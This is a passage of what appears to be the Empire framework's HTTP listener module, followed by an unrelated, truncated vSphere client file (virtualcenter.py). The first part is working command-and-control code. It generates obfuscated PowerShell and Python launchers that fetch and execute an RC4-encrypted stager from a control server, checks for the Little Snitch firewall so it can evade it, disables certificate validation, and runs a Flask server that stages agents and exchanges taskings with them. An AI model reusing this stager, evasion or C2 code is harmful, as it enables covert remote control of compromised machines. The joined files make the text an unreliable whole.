stager += "\"Cookie\",\"session=%s\");" % (b64RoutingPacket)
stager += "$ser='%s';$t='%s';" % (host, stage0)
stager += helpers.randomize_capitalization("$data=$WC.DownloadData($ser+$t);")
stager += helpers.randomize_capitalization("$iv=$data[0..3];$data=$data[4..$data.length];")
# decode everything and kick it over to IEX to kick off execution
stager += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$K))|IEX")
if obfuscate:
stager = helpers.obfuscate(stager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())):
return helpers.powershell_launcher(stager, launcher)
else:
# otherwise return the case-randomized stager
return stager
if language.startswith('py'):
# Python
launcherBase = 'import sys;'
if "https" in host:
# monkey patch ssl woohooo
launcherBase += "import ssl;\nif hasattr(ssl, '_create_unverified_context'):ssl._create_default_https_context = ssl._create_unverified_context;\n"
try:
if safeChecks.lower() == 'true':
launcherBase += "import re, subprocess;"
launcherBase += "cmd = \"ps -ef | grep Little\ Snitch | grep -v grep\"\n"
launcherBase += "ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)\n"
launcherBase += "out = ps.stdout.read()\n"
launcherBase += "ps.stdout.close()\n"
launcherBase += "if re.search(\"Little Snitch\", out):\n"
launcherBase += " sys.exit()\n"
except Exception as e:
p = "[!] Error setting LittleSnitch in stager: " + str(e)
print helpers.color(p, color='red')
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
launcherBase += "import urllib2;\n"
launcherBase += "UA='%s';" % (userAgent)
launcherBase += "server='%s';t='%s';" % (host, stage0)
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='PYTHON', meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket)
launcherBase += "req=urllib2.Request(server+t);\n"
# add the RC4 packet to a cookie
launcherBase += "req.add_header('User-Agent',UA);\n"
launcherBase += "req.add_header('Cookie',\"session=%s\");\n" % (b64RoutingPacket)
# Add custom headers if any
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
#launcherBase += ",\"%s\":\"%s\"" % (headerKey, headerValue)
launcherBase += "req.add_header(\"%s\",\"%s\");\n" % (headerKey, headerValue)
if proxy.lower() != "none":
if proxy.lower() == "default":
launcherBase += "proxy = urllib2.ProxyHandler();\n"
else:
proto = proxy.Split(':')[0]
launcherBase += "proxy = urllib2.ProxyHandler({'"+proto+"':'"+proxy+"'});\n"
if proxyCreds != "none":
if proxyCreds == "default":
launcherBase += "o = urllib2.build_opener(proxy);\n"
else:
launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n"
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
launcherBase += "proxy_auth_handler.add_password(None,"+proxy+","+username+","+password+");\n"
launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n"
else:
launcherBase += "o = urllib2.build_opener(proxy);\n"
else:
launcherBase += "o = urllib2.build_opener();\n"
#install proxy and creds globally, so they can be used with urlopen.
launcherBase += "urllib2.install_opener(o);\n"
# download the stager and extract the IV
launcherBase += "a=urllib2.urlopen(req).read();\n"
launcherBase += "IV=a[0:4];"
launcherBase += "data=a[4:];"
launcherBase += "key=IV+'%s';" % (stagingKey)
# RC4 decryption
launcherBase += "S,j,out=range(256),0,[]\n"
launcherBase += "for i in range(256):\n"
launcherBase += " j=(j+S[i]+ord(key[i%len(key)]))%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += "i=j=0\n"
launcherBase += "for char in data:\n"
launcherBase += " i=(i+1)%256\n"
launcherBase += " j=(j+S[i])%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += " out.append(chr(ord(char)^S[(S[i]+S[j])%256]))\n"
launcherBase += "exec(''.join(out))"
if encode:
launchEncoded = base64.b64encode(launcherBase)
launcher = "echo \"import sys,base64,warnings;warnings.filterwarnings(\'ignore\');exec(base64.b64decode('%s'));\" | python &" % (launchEncoded)
return launcher
else:
return launcherBase
else:
print helpers.color("[!] listeners/http generate_launcher(): invalid language specification: only 'powershell' and 'python' are currently supported for this module.")
else:
print helpers.color("[!] listeners/http generate_launcher(): invalid listener name specification!")
def generate_stager(self, listenerOptions, encode=False, encrypt=True, obfuscate=False, obfuscationCommand="", language=None):
"""
Generate the stager code needed for communications with this listener.
"""
if not language:
print helpers.color('[!] listeners/http generate_stager(): no language specified!')
return None
profile = listenerOptions['DefaultProfile']['Value']
uris = [a.strip('/') for a in profile.split('|')[0].split(',')]
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
host = listenerOptions['Host']['Value']
customHeaders = profile.split('|')[2:]
# select some random URIs for staging from the main profile
stage1 = random.choice(uris)
stage2 = random.choice(uris)
if language.lower() == 'powershell':
# read in the stager base
f = open("%s/data/agent/stagers/http.ps1" % (self.mainMenu.installPath))
stager = f.read()
f.close()
# make sure the server ends with "/"
if not host.endswith("/"):
host += "/"
#Patch in custom Headers
if customHeaders != []:
headers = ','.join(customHeaders)
stager = stager.replace("$customHeaders = \"\";","$customHeaders = \""+headers+"\";")
#patch in working hours, if any
if workingHours != "":
stager = stager.replace('WORKING_HOURS_REPLACE', workingHours)
# patch the server and key information
stager = stager.replace('REPLACE_SERVER', host)
stager = stager.replace('REPLACE_STAGING_KEY', stagingKey)
stager = stager.replace('index.jsp', stage1)
stager = stager.replace('index.php', stage2)
randomizedStager = ''
for line in stager.split("\n"):
line = line.strip()
# skip commented line
if not line.startswith("#"):
# randomize capitalization of lines without quoted strings
if "\"" not in line:
randomizedStager += helpers.randomize_capitalization(line)
else:
randomizedStager += line
if obfuscate:
randomizedStager = helpers.obfuscate(randomizedStager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode:
return helpers.enc_powershell(randomizedStager)
elif encrypt:
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV+stagingKey, randomizedStager)
else:
# otherwise just return the case-randomized stager
return randomizedStager
elif language.lower() == 'python':
# read in the stager base
f = open("%s/data/agent/stagers/http.py" % (self.mainMenu.installPath))
stager = f.read()
f.close()
stager = helpers.strip_python_comments(stager)
if host.endswith("/"):
host = host[0:-1]
# # patch the server and key information
stager = stager.replace("REPLACE_STAGING_KEY", stagingKey)
stager = stager.replace("REPLACE_PROFILE", profile)
stager = stager.replace("index.jsp", stage1)
stager = stager.replace("index.php", stage2)
# # base64 encode the stager and return it
if encode:
return base64.b64encode(stager)
if encrypt:
# return an encrypted version of the stager ("normal" staging)
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV+stagingKey, stager)
else:
# otherwise return the standard stager
return stager
else:
print helpers.color("[!] listeners/http generate_stager(): invalid language specification, only 'powershell' and 'python' are currently supported for this module.")
def generate_agent(self, listenerOptions, language=None, obfuscate=False, obfuscationCommand=""):
"""
Generate the full agent code needed for communications with this listener.
"""
if not language:
print helpers.color('[!] listeners/http generate_agent(): no language specified!')
return None
language = language.lower()
delay = listenerOptions['DefaultDelay']['Value']
jitter = listenerOptions['DefaultJitter']['Value']
profile = listenerOptions['DefaultProfile']['Value']
lostLimit = listenerOptions['DefaultLostLimit']['Value']
killDate = listenerOptions['KillDate']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
b64DefaultResponse = base64.b64encode(self.default_response())
if language == 'powershell':
f = open(self.mainMenu.installPath + "./data/agent/agent.ps1")
code = f.read()
f.close()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_powershell_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay))
code = code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter))
code = code.replace('$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', "$Profile = \"" + str(profile) + "\"")
code = code.replace('$LostLimit = 60', "$LostLimit = " + str(lostLimit))
code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "'+str(b64DefaultResponse)+'"')
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',")
if obfuscate:
code = helpers.obfuscate(code, obfuscationCommand=obfuscationCommand)
return code
elif language == 'python':
f = open(self.mainMenu.installPath + "./data/agent/agent.py")
code = f.read()
f.close()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_python_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('delay = 60', 'delay = %s' % (delay))
code = code.replace('jitter = 0.0', 'jitter = %s' % (jitter))
code = code.replace('profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', 'profile = "%s"' % (profile))
code = code.replace('lostLimit = 60', 'lostLimit = %s' % (lostLimit))
code = code.replace('defaultResponse = base64.b64decode("")', 'defaultResponse = base64.b64decode("%s")' % (b64DefaultResponse))
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('killDate = ""', 'killDate = "%s"' % (killDate))
if workingHours != "":
code = code.replace('workingHours = ""', 'workingHours = "%s"' % (killDate))
return code
else:
print helpers.color("[!] listeners/http generate_agent(): invalid language specification, only 'powershell' and 'python' are currently supported for this module.")
def generate_comms(self, listenerOptions, language=None):
"""
Generate just the agent communication code block needed for communications with this listener.
This is so agents can easily be dynamically updated for the new listener.
"""
if language:
if language.lower() == 'powershell':
updateServers = """
$Script:ControlServers = @("%s");
$Script:ServerIndex = 0;
""" % (listenerOptions['Host']['Value'])
if listenerOptions['Host']['Value'].startswith('https'):
updateServers += "\n[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
getTask = """
function script:Get-Task {
try {
if ($Script:ControlServers[$Script:ServerIndex].StartsWith("http")) {
# meta 'TASKING_REQUEST' : 4
$RoutingPacket = New-RoutingPacket -EncData $Null -Meta 4
$RoutingCookie = [Convert]::ToBase64String($RoutingPacket)
# build the web request object
$wc = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
$wc.Headers.Add("User-Agent",$script:UserAgent)
$script:Headers.GetEnumerator() | % {$wc.Headers.Add($_.Name, $_.Value)}
$wc.Headers.Add("Cookie", "session=$RoutingCookie")
# choose a random valid URI for checkin
$taskURI = $script:TaskURIs | Get-Random
$result = $wc.DownloadData($Script:ControlServers[$Script:ServerIndex] + $taskURI)
$result
}
}
catch [Net.WebException] {
$script:MissedCheckins += 1
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
"""
sendMessage = """
function script:Send-Message {
param($Packets)
if($Packets) {
# build and encrypt the response packet
$EncBytes = Encrypt-Bytes $Packets
# build the top level RC4 "routing packet"
# meta 'RESULT_POST' : 5
$RoutingPacket = New-RoutingPacket -EncData $EncBytes -Meta 5
if($Script:ControlServers[$Script:ServerIndex].StartsWith('http')) {
# build the web request object
$wc = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
$wc.Headers.Add('User-Agent', $Script:UserAgent)
$Script:Headers.GetEnumerator() | ForEach-Object {$wc.Headers.Add($_.Name, $_.Value)}
try {
# get a random posting URI
$taskURI = $Script:TaskURIs | Get-Random
$response = $wc.UploadData($Script:ControlServers[$Script:ServerIndex]+$taskURI, 'POST', $RoutingPacket);
}
catch [System.Net.WebException]{
# exception posting data...
}
}
}
}
"""
return updateServers + getTask + sendMessage
elif language.lower() == 'python':
updateServers = "server = '%s'\n" % (listenerOptions['Host']['Value'])
if listenerOptions['Host']['Value'].startswith('https'):
updateServers += "hasattr(ssl, '_create_unverified_context') and ssl._create_unverified_context() or None"
sendMessage = """
def send_message(packets=None):
# Requests a tasking or posts data to a randomized tasking URI.
# If packets == None, the agent GETs a tasking from the control server.
# If packets != None, the agent encrypts the passed packets and
# POSTs the data to the control server.
global missedCheckins
global server
global headers
global taskURIs
data = None
if packets:
data = ''.join(packets)
# aes_encrypt_then_hmac is in stager.py
encData = aes_encrypt_then_hmac(key, data)
data = build_routing_packet(stagingKey, sessionID, meta=5, encData=encData)
else:
# if we're GETing taskings, then build the routing packet to stuff info a cookie first.
# meta TASKING_REQUEST = 4
routingPacket = build_routing_packet(stagingKey, sessionID, meta=4)
b64routingPacket = base64.b64encode(routingPacket)
headers['Cookie'] = "session=%s" % (b64routingPacket)
taskURI = random.sample(taskURIs, 1)[0]
requestUri = server + taskURI
try:
data = (urllib2.urlopen(urllib2.Request(requestUri, data, headers))).read()
return ('200', data)
except urllib2.HTTPError as HTTPError:
# if the server is reached, but returns an erro (like 404)
missedCheckins = missedCheckins + 1
return (HTTPError.code, '')
except urllib2.URLError as URLerror:
# if the server cannot be reached
missedCheckins = missedCheckins + 1
return (URLerror.reason, '')
return ('', '')
"""
return updateServers + sendMessage
else:
print helpers.color("[!] listeners/http generate_comms(): invalid language specification, only 'powershell' and 'python' are currently supported for this module.")
else:
print helpers.color('[!] listeners/http generate_comms(): no language specified!')
def start_server(self, listenerOptions):
"""
Threaded function that actually starts up the Flask server.
"""
# make a copy of the currently set listener options for later stager/agent generation
listenerOptions = copy.deepcopy(listenerOptions)
# suppress the normal Flask output
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
bindIP = listenerOptions['BindIP']['Value']
host = listenerOptions['Host']['Value']
port = listenerOptions['Port']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
app = Flask(__name__)
self.app = app
@app.before_request
def check_ip():
"""
Before every request, check if the IP address is allowed.
"""
if not self.mainMenu.agents.is_ip_allowed(request.remote_addr):
dispatcher.send("[!] %s on the blacklist/not on the whitelist requested resource" % (request.remote_addr), sender="listeners/http")
return make_response(self.default_response(), 200)
@app.after_request
def change_header(response):
"Modify the default server version in the response."
response.headers['Server'] = listenerOptions['ServerVersion']['Value']
return response
@app.after_request
def add_proxy_headers(response):
"Add HTTP headers to avoid proxy caching."
response.headers['Cache-Control'] = "no-cache, no-store, must-revalidate"
response.headers['Pragma'] = "no-cache"
response.headers['Expires'] = "0"
return response
@app.route('/<path:request_uri>', methods=['GET'])
def handle_get(request_uri):
"""
Handle an agent GET request.
This is used during the first step of the staging process,
and when the agent requests taskings.
"""
clientIP = request.remote_addr
dispatcher.send("[*] GET request for %s/%s from %s" % (request.host, request_uri, clientIP), sender='listeners/http')
routingPacket = None
cookie = request.headers.get('Cookie')
if cookie and cookie != '':
try:
# see if we can extract the 'routing packet' from the specified cookie location
# NOTE: this can be easily moved to a paramter, another cookie value, etc.
if 'session' in cookie:
dispatcher.send("[*] GET cookie value from %s : %s" % (clientIP, cookie), sender='listeners/http')
cookieParts = cookie.split(';')
for part in cookieParts:
if part.startswith('session'):
base64RoutingPacket = part[part.find('=')+1:]
# decode the routing packet base64 value in the cookie
routingPacket = base64.b64decode(base64RoutingPacket)
except Exception as e:
routingPacket = None
pass
if routingPacket:
# parse the routing packet and process the results
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, routingPacket, listenerOptions, clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if results:
if results == 'STAGE0':
# handle_agent_data() signals that the listener should return the stager.ps1 code
# step 2 of negotiation -> return stager.ps1 (stage 1)
dispatcher.send("[*] Sending %s stager (stage 1) to %s" % (language, clientIP), sender='listeners/http')
stage = self.generate_stager(language=language, listenerOptions=listenerOptions, obfuscate=self.mainMenu.obfuscate, obfuscationCommand=self.mainMenu.obfuscateCommand)
return make_response(stage, 200)
elif results.startswith('ERROR:'):
dispatcher.send("[!] Error from agents.handle_agent_data() for %s from %s: %s" % (request_uri, clientIP, results), sender='listeners/http')
if 'not in cache' in results:
# signal the client to restage
print helpers.color("[*] Orphaned agent from %s, signaling retaging" % (clientIP))
return make_response(self.default_response(), 401)
else:
return make_response(self.default_response(), 200)
else:
# actual taskings
dispatcher.send("[*] Agent from %s retrieved taskings" % (clientIP), sender='listeners/http')
return make_response(results, 200)
else:
# dispatcher.send("[!] Results are None...", sender='listeners/http')
return make_response(self.default_response(), 200)
else:
return make_response(self.default_response(), 200)
else:
dispatcher.send("[!] %s requested by %s with no routing packet." % (request_uri, clientIP), sender='listeners/http')
return make_response(self.default_response(), 200)
@app.route('/<path:request_uri>', methods=['POST'])
def handle_post(request_uri):
"""
Handle an agent POST request.
"""
stagingKey = listenerOptions['StagingKey']['Value']
clientIP = request.remote_addr
requestData = request.get_data()
dispatcher.send("[*] POST request data length from %s : %s" % (clientIP, len(requestData)), sender='listeners/http')
# the routing packet should be at the front of the binary request.data
# NOTE: this can also go into a cookie/etc.
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, requestData, listenerOptions, clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if results:
if results.startswith('STAGE2'):
# TODO: document the exact results structure returned
if ':' in clientIP:
clientIP = '[' + str(clientIP) + ']'
sessionID = results.split(' ')[1].strip()
sessionKey = self.mainMenu.agents.agents[sessionID]['sessionKey']
dispatcher.send("[*] Sending agent (stage 2) to %s at %s" % (sessionID, clientIP), sender='listeners/http')
hopListenerName = request.headers.get('Hop-Name')
try:
hopListener = helpers.get_listener_options(hopListenerName)
tempListenerOptions = copy.deepcopy(listenerOptions)
tempListenerOptions['Host']['Value'] = hopListener['Host']['Value']
except TypeError:
tempListenerOptions = listenerOptions
# step 6 of negotiation -> server sends patched agent.ps1/agent.py
agentCode = self.generate_agent(language=language, listenerOptions=tempListenerOptions, obfuscate=self.mainMenu.obfuscate, obfuscationCommand=self.mainMenu.obfuscateCommand)
encryptedAgent = encryption.aes_encrypt_then_hmac(sessionKey, agentCode)
# TODO: wrap ^ in a routing packet?
return make_response(encryptedAgent, 200)
elif results[:10].lower().startswith('error') or results[:10].lower().startswith('exception'):
dispatcher.send("[!] Error returned for results by %s : %s" %(clientIP, results), sender='listeners/http')
return make_response(self.default_response(), 200)
elif results == 'VALID':
dispatcher.send("[*] Valid results return by %s" % (clientIP), sender='listeners/http')
return make_response(self.default_response(), 200)
else:
return make_response(results, 200)
else:
return make_response(self.default_response(), 200)
else:
return make_response(self.default_response(), 200)
try:
certPath = listenerOptions['CertPath']['Value']
host = listenerOptions['Host']['Value']
if certPath.strip() != '' and host.startswith('https'):
certPath = os.path.abspath(certPath)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath))
app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context)
else:
app.run(host=bindIP, port=int(port), threaded=True)
except Exception as e:
print helpers.color("[!] Listener startup on port %s failed: %s " % (port, e))
dispatcher.send("[!] Listener startup on port %s failed: %s " % (port, e), sender='listeners/http')
def start(self, name=''):
"""
Start a threaded instance of self.start_server() and store it in the
self.threads dictionary keyed by the listener name.
"""
listenerOptions = self.options
if name and name != '':
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
else:
name = listenerOptions['Name']['Value']
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
def shutdown(self, name=''):
"""
Terminates the server thread stored in the self.threads dictionary,
keyed by the listener name.
"""
if name and name != '':
print helpers.color("[!] Killing listener '%s'" % (name))
self.threads[name].kill()
else:
print helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value']))
self.threads[self.options['Name']['Value']].kill()
|
virtualcenter.py | # coding: utf-8
"""Backend management system classes
Used to communicate with providers without using CFME facilities
"""
from __future__ import absolute_import
import atexit
import operator
import re
import ssl
import threading
import time
from datetime import datetime
from distutils.version import LooseVersion
from functools import partial
import pytz
import six
from cached_property import threaded_cached_property
from pyVim.connect import Disconnect, SmartConnect
from pyVmomi import vim, vmodl
from wait_for import TimedOutError, wait_for
from .base import VMInfo, WrapanapiAPIBaseVM
from .exceptions import (HostNotRemoved, VMCreationDateError,
VMInstanceNotCloned, VMInstanceNotFound,
VMInstanceNotSuspended, VMNotFoundViaIP)
SELECTION_SPECS = [
'resource_pool_traversal_spec',
'resource_pool_vm_traversal_spec',
'folder_traversal_spec',
'datacenter_host_traversal_spec',
'datacenter_vm_traversal_spec',
'compute_resource_rp_traversal_spec',
'compute_resource_host_traversal_spec',
'host_vm_traversal_spec',
'datacenter_datastore_traversal_spec'
]
TRAVERSAL_SPECS = [
{
'name': 'resource_pool_traversal_spec',
'type': vim.ResourcePool,
'path': 'resourcePool',
'select_indices': [0, 1]
},
{
'name': 'resource_pool_vm_traversal_spec',
'type': vim.ResourcePool,
'path': 'vm',
'select_indices': []
},
{
'name': 'compute_resource_rp_traversal_spec',
'type': vim.ComputeResource,
'path': 'resourcePool',
'select_indices': [0, 1]
},
{
'name': 'compute_resource_host_traversal_spec',
'type': vim.ComputeResource,
'path': 'host',
'select_indices': []
},
{
'name': 'datacenter_host_traversal_spec',
'type': vim.Datacenter,
'path': 'hostFolder',
'select_indices': [2]
},
{
'name': 'datacenter_datastore_traversal_spec',
'type': vim.Datacenter,
'path': 'datastoreFolder',
'select_indices': [2]
},
{
'name': 'datacenter_vm_traversal_spec',
'type': vim.Datacenter,
'path': 'vmFolder',
'select_indices': [2]
},
{
'name': 'host_vm_traversal_spec',
'type': vim.HostSystem,
'path': 'vm',
'select_indices': [2]
},
{
'name': 'folder_traversal_spec',
'type': vim.Folder,
'path': 'childEntity',
'select_indices': [2, 3, 4, 5, 6, 7, 1, 8]
}
]
def get_task_error_message(task):
"""Depending on the error type, a different attribute may contain the error message. This
function will figure out the error message.
"""
if hasattr(task.info.error, 'message'):
message = str(task.info.error.message)
elif hasattr(task.info.error, 'localizedMessage'):
message = str(task.info.error.localizedMessage)
elif hasattr(task.info.error, 'msg'):
message = str(task.info.error.msg)
else:
message = 'Unknown error type: {}'.format(task.info.error)
return message
class VMWareSystem(WrapanapiAPIBaseVM):
"""Client to Vsphere API
Args:
hostname: The hostname of the system.
username: The username to connect with.
password: The password to connect with.
See also:
vSphere Management SDK API docs
https://developercenter.vmware.com/web/dp/doc/preview?id=155
"""
_api = None
_stats_available = {
'num_vm': lambda self: len(self.list_vm()),
'num_host': lambda self: len(self.list_host()),
'num_cluster': lambda self: len(self.list_cluster()),
'num_template': lambda self: len(self.list_template()),
'num_datastore': lambda self: len(self.list_datastore()),
}
POWERED_ON = 'poweredOn'
POWERED_OFF = 'poweredOff'
SUSPENDED = 'suspended'
def __init__(self, hostname, username, password, **kwargs):
super(VMWareSystem, self).__init__(kwargs)
self.hostname = hostname
self.username = username
self.password = password
self._vm_cache = {}
self.kwargs = kwargs
def _start_keepalive(self):
"""
Send a 'current time' request to vCenter every 10 min as a
connection keep-alive
"""
def _keepalive():
while True:
self.logger.debug(
"vCenter keep-alive: %s", self.service_instance.CurrentTime()
)
time.sleep(600)
t = threading.Thread(target=_keepalive)
t.daemon = True
t.start()
def _create_service_instance(self):
"""
Create service instance and start a keep-alive thread
See https://github.com/vmware/pyvmomi/issues/347 for why this is needed.
"""
try:
# Disable SSL cert verification
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_NONE
si = SmartConnect(
host=self.hostname,
user=self.username,
pwd=self.password,
sslContext=context
)
except Exception:
self.logger.error("Failed to connect to vCenter")
raise
# Disconnect at teardown
atexit.register(Disconnect, si)
self.logger.info(
"Connected to vCenter host %s as user %s",
self.hostname, self.username
)
self._start_keepalive()
return si
@threaded_cached_property
def service_instance(self):
"""An instance of the service"""
self.logger.debug("Attempting to initiate vCenter service instance")
return self._create_service_instance()
@threaded_cached_property
def content(self):
self.logger.debug("calling RetrieveContent()... this might take awhile")
return self.service_instance.RetrieveContent()
@property
def version(self):
"""The product version"""
return LooseVersion(self.content.about.version)
@property
def default_resource_pool(self):
return self.kwargs.get("default_resource_pool")
def _get_obj_list(self, vimtype, folder=None):
"""Get a list of objects of type ``vimtype``"""
folder = folder or self.content.rootFolder
container = self.content.viewManager.CreateContainerView(folder, [vimtype], True)
return container.view
def _get_obj(self, vimtype, name, folder=None):
"""Get an object of type ``vimtype`` with name ``name`` from Vsphere"""
obj = None
for item in self._get_obj_list(vimtype, folder):
if item.name == name:
obj = item
break
return obj
def _search_folders_for_vm(self, name):
# First get all VM folders
container = self.content.viewManager.CreateContainerView(
self.content.rootFolder, [vim.Folder], True)
folders = container.view
container.Destroy()
# Now search each folder for VM
vm = None
for folder in folders:
vm = self.content.searchIndex.FindChild(folder, name)
if vm:
break
return vm
def _build_filter_spec(self, begin_entity, property_spec):
"""Build a search spec for full inventory traversal, adapted from psphere"""
# Create selection specs
selection_specs = [vmodl.query.PropertyCollector.SelectionSpec(name=ss)
for ss in SELECTION_SPECS]
# Create traversal specs
traversal_specs = []
for spec_values in TRAVERSAL_SPECS:
spec = vmodl.query.PropertyCollector.TraversalSpec()
spec.name = spec_values['name']
spec.type = spec_values['type']
spec.path = spec_values['path']
if spec_values.get('select_indices'):
spec.selectSet = [selection_specs[i] for i in spec_values['select_indices']]
traversal_specs.append(spec)
# Create an object spec
obj_spec = vmodl.query.PropertyCollector.ObjectSpec()
obj_spec.obj = begin_entity
obj_spec.selectSet = traversal_specs
# Create a filter spec
filter_spec = vmodl.query.PropertyCollector.FilterSpec()
filter_spec.propSet = [property_spec]
filter_spec.objectSet = [obj_spec]
return filter_spec
def _get_updated_obj(self, obj):
"""
Build a filter spec based on ``obj`` and return the updated object.
Args:
obj (pyVmomi.ManagedObject): The managed object to update, will be a specific subclass
"""
# Set up the filter specs
property_spec = vmodl.query.PropertyCollector.PropertySpec(type=type(obj), all=True)
object_spec = vmodl.query.PropertyCollector.ObjectSpec(obj=obj)
filter_spec = vmodl.query.PropertyCollector.FilterSpec()
filter_spec.propSet = [property_spec]
filter_spec.objectSet = [object_spec]
# Get updates based on the filter
property_collector = self.content.propertyCollector
filter_ = property_collector.CreateFilter(filter_spec, True)
update = property_collector.WaitForUpdates(None)
if not update or not update.filterSet or not update.filterSet[0]:
self.logger.warning('No object found when updating %s', str(obj))
return
if filter_:
filter_.Destroy()
return update.filterSet[0].objectSet[0].obj
def _get_vm(self, vm_name, force=False):
"""Returns a vm from the VI object.
Instead of using self._get_obj, this uses more efficient ways of
searching for the VM since we can often have lots of VM's on the
provider to sort through.
Args:
vm_name (string): The name of the VM
force (bool): Ignore the cache when updating
Returns:
pyVmomi.vim.VirtualMachine: VM object
"""
if vm_name not in self._vm_cache or force:
self.logger.debug("Searching all vm folders for vm '%s'", vm_name)
vm = self._search_folders_for_vm(vm_name)
if not vm:
raise VMInstanceNotFound(vm_name)
self._vm_cache[vm_name] = vm
else:
self._vm_cache[vm_name] = self._get_updated_obj(self._vm_cache[vm_name])
return self._vm_cache[vm_name]
def _get_resource_pool(self, resource_pool_name=None):
""" Returns a resource pool managed object for a specified name.
Args:
resource_pool_name (string): The name of the resource pool. If None, first one will be
picked.
Returns:
pyVmomi.vim.ResourcePool: The managed object of the resource pool.
"""
if resource_pool_name is not None:
return self._get_obj(vim.ResourcePool, resource_pool_name)
elif self.default_resource_pool is not None:
return self._get_obj(vim.ResourcePool, self.default_resource_pool)
else:
return self._get_obj_list(vim.ResourcePool)[0]
def _task_wait(self, task):
"""
Update a task and check its state. If the task state is not ``queued``, ``running`` or
``None``, then return the state. Otherwise return None.
Args:
task (pyVmomi.vim.Task): The task whose state is being monitored
Returns:
string: pyVmomi.vim.TaskInfo.state value if the task is not queued/running/None
"""
task = self._get_updated_obj(task)
if task.info.state not in ['queued', 'running', None]:
return task.info.state
def _task_status(self, task):
"""Update a task and return its state, as a vim.TaskInfo.State string wrapper
Args:
task (pyVmomi.vim.Task): The task whose state is being returned
Returns:
string: pyVmomi.vim.TaskInfo.state value
"""
task = self._get_updated_obj(task)
return task.info.state
def does_vm_exist(self, name):
""" Checks if a vm exists or not.
Args:
name: The name of the requested vm.
Returns: A boolean, ``True`` if the vm exists, ``False`` if not.
"""
try:
return self._get_vm(name) is not None
except VMInstanceNotFound:
return False
def current_ip_address(self, vm_name):
ipv4_re = r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}'
try:
vm = self._get_vm(vm_name)
ip_address = vm.summary.guest.ipAddress
if not re.match(ipv4_re, ip_address) or ip_address == '127.0.0.1':
ip_address = None
return ip_address
except (AttributeError, TypeError):
# AttributeError: vm doesn't have an ip address yet
# TypeError: ip address wasn't a string
return None
def get_ip_address(self, vm_name, timeout=600):
""" Returns the first IP address for the selected VM.
Args:
vm_name: The name of the vm to obtain the IP for.
timeout: The IP address wait timeout.
Returns: A string containing the first found IP that isn't the loopback device.
"""
try:
ip_address, tc = wait_for(lambda: self.current_ip_address(vm_name),
fail_condition=None, delay=5, num_sec=timeout,
message="get_ip_address from vsphere")
except TimedOutError:
ip_address = None
return ip_address
def _get_list_vms(self, get_template=False, inaccessible=False):
""" Obtains a list of all VMs on the system.
Optional flag to obtain template names too.
Args:
